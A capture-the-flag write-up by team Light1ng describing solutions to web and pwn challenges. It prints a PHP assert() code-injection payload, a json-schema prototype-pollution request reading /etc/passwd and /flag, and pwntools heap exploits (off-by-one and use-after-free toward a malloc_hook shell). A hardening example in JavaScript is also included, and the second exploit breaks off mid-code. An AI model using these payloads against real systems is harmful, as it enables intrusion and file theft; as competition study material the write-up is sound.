Team Light1ng
I. Team information
- Name: Light1ng
- Rank: 16
II. Solve status
Can't get into the platform anymore, so no screenshots.
III. Solution write-ups
Web
1.ezphp
The About page mentions Git, so we suspected a leaked .git directory.
The PHP code in index.php:
<?php
if (isset($_GET['link_page'])) {
    $link_page = $_GET['link_page'];
} else {
    $link_page = "home";
}
$page_file = "pages/" . $link_page . ".php";
$safe_check1 = "strpos('$page_file', '..') === false";
assert($safe_check1) or die("no no no!");
// safe!
$safe_check2 = "file_exists('$page_file')";
assert($safe_check2) or die("no this file!");
?>
Because assert() evaluates its string argument as PHP code and the $link_page parameter is user-controlled, this is an RCE.
Close the quoted string to break out of the check:
?link_page=flag.php', '..') === true|eval($_POST['yy']);//
POST body:
yy=system('ls /');
It executes; connect with AntSword:
The flag is in the pages directory:
DASCTF{af5ff99c7f98d528e711acc42fd6b906}
2.Looking for treasure
Opening the page source shows a hint.
Download the source and audit it.
There is one spot:
Here the file p is read; if we can control the value of p we get arbitrary file read.
The content will never equal req.body, so that check can be ignored; the content of p therefore ends up being sent back in the error message's content field.
Let's see where p comes from.
p is assigned from config.path, so we need a way to control the value of path.
In the source we see:
Seeing this brings to mind json-schema prototype pollution.
Payload:
{
  "$schema": {
    "type": "object",
    "properties": {
      "__proto__": {
        "type": "object",
        "properties": {
          "path": {
            "type": "string",
            "default": "/etc/passwd"
          }
        }
      }
    }
  }
}
That successfully reads /etc/passwd; guessing the flag is in the root directory, read /flag directly:
{
  "$schema": {
    "type": "object",
    "properties": {
      "__proto__": {
        "type": "object",
        "properties": {
          "path": {
            "type": "string",
            "default": "/flag"
          }
        }
      }
    }
  }
}
Request:
POST /validated HTTP/1.1
Host: 26db192b-6f66-42c2-b783-cbe5f58cbd88.zzctf.dasctf.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/json
Content-Length: 132
Origin: http://26db192b-6f66-42c2-b783-cbe5f58cbd88.zzctf.dasctf.com
Connection: close
Referer: http://26db192b-6f66-42c2-b783-cbe5f58cbd88.zzctf.dasctf.com/
Upgrade-Insecure-Requests: 1
{"$schema":{"type":"object","properties":{"__proto__":{"type":"object","properties":{"path":{"type":"string","default":"/flag"}}}}}}
DASCTF{5117143e660f592adc982dd96d2c3f17}
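The prototype-pollution chain above, as an added example that is not the writeup's or the json-schema library's code: a minimal default-applying walk in the style of that library, shown in its vulnerable form beside a hardened one that refuses `__proto__`/`constructor`/`prototype` keys and only writes own properties. The walk itself and the stand-in `config` object are assumptions; the schema is the writeup's with its `$schema` wrapper removed.

```javascript
// Vulnerable: walks schema.properties and writes defaults into the instance.
function applyDefaultsVulnerable(instance, schema) {
  if (!schema || schema.type !== 'object' || !schema.properties) return instance;
  for (const key of Object.keys(schema.properties)) {
    const sub = schema.properties[key];
    // A key named "__proto__" resolves to Object.prototype, so the nested "path" default lands on every object.
    if (instance[key] === undefined && sub.default !== undefined) instance[key] = sub.default;
    if (sub.type === 'object') {
      if (instance[key] === undefined) instance[key] = {};
      applyDefaultsVulnerable(instance[key], sub);
    }
  }
  return instance;
}
// Hardened: reject prototype-reaching keys and touch own properties only.
const UNSAFE_KEYS = new Set(['__proto__', 'constructor', 'prototype']);
const hasOwn = (o, k) => Object.prototype.hasOwnProperty.call(o, k);
function applyDefaultsSafe(instance, schema) {
  if (!schema || schema.type !== 'object' || !schema.properties) return instance;
  for (const key of Object.keys(schema.properties)) {
    if (UNSAFE_KEYS.has(key)) throw new Error('unsafe property name: ' + key);
    const sub = schema.properties[key];
    if (!hasOwn(instance, key) && sub.default !== undefined) instance[key] = sub.default;
    if (sub.type === 'object') {
      if (!hasOwn(instance, key)) instance[key] = {};
      applyDefaultsSafe(instance[key], sub);
    }
  }
  return instance;
}
// Constructed input: the writeup's schema minus its "$schema" wrapper, parsed
// from JSON so "__proto__" is an own key (an object literal would set the prototype).
const POLLUTING_SCHEMA = JSON.parse('{"type":"object","properties":{"__proto__":' +
  '{"type":"object","properties":{"path":{"type":"string","default":"/etc/passwd"}}}}}');
// Each runner reports what an unrelated config object (a stand-in for the app's
// config) sees as `path` after the walk; the vulnerable one undoes the pollution.
function runVulnerable() {
  const config = {};
  try { applyDefaultsVulnerable({}, POLLUTING_SCHEMA); return config.path; }
  finally { delete Object.prototype.path; }
}
function runSafe() {
  const config = {};
  let rejected = false;
  try { applyDefaultsSafe({}, POLLUTING_SCHEMA); } catch (e) { rejected = true; }
  return { rejected: rejected, path: config.path };
}
```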
PWN
1.null
A standard menu-style heap challenge with an off-by-one bug. We can see that both edit and add call read_input(), and the bug is inside read_input().
You can see that a2+1 reads one byte too many; we use this to overwrite a chunk's size field and create overlapping chunks.
Exp:
from pwn import *

#io=process('./null')
io=remote('82.157.5.28',50404)
elf=ELF('./null')
#libc=elf.libc
libc=ELF('./libc-2.23')

def choice(choice):
    io.sendlineafter('choice :',str(choice))

def malloc(index,size,context):
    choice(1)
    io.sendlineafter('Index:',str(index))
    io.sendlineafter('Size of Heap : ',str(size))
    io.sendafter('Content?:',context)

def free(index):
    choice(2)
    io.sendlineafter('Index:',str(index))

def edit(index,context):
    choice(3)
    io.sendlineafter('Index:',str(index))
    io.sendafter('Content?:',context)

def view(index):
    choice(4)
    io.sendlineafter('Index :',str(index))

def pwn():
    malloc(0,0x18,'0\n')
    malloc(1,0x78,'1\n')
    malloc(2,0x68,'2\n')
    malloc(3,0x68,'3\n')
    malloc(4,0x88,'4\n')
    # off-by-one: the extra byte rewrites the next chunk's size field
    edit(0,'0'*0x18+p8(0xf1))
    free(1)
    malloc(1,0x78,'\n')
    # the overlapping chunk leaks a libc pointer
    view(2)
    addr=u64(io.recvuntil('\x7f')[-6:].ljust(8,'\x00'))
    mallochook=addr-0x68
    libcbase=mallochook-libc.symbols['__malloc_hook']
    onegadget=[0x45226,0x4527a,0xf03a4,0xf1247]
    malloc(5,0x68,'5\n')
    free(5)
    edit(2,p64(mallochook-0x23)+'\n')
    malloc(6,0x68,'6\n')
    malloc(7,0x68,'7'*0x13+p64(onegadget[3]+libcbase))#malloc_hook
    io.sendlineafter('choice :','1')
    io.sendlineafter('Index:','8')
    io.sendlineafter('Size of Heap : ',str(0x18))
    io.interactive()

pwn()
2.uaf
A standard menu challenge.
The bug: the pointer is not zeroed after free, giving a UAF. Free a chunk to leak libc directly, then target __malloc_hook.
Exp:
from pwn import *

sh=remote('82.157.5.28',51402)
context.log_level='debug'
elf=ELF('./uaf_pwn')
libc=elf.libc

def exp():
    def add(size):
        sh.sendlineafter(">","1")
        sh.sendlineafter("size>",str(size))
    def dele(idx):
        sh.sendlineafter(">","2")
        sh.sendlineafter("index>",str(idx))
    def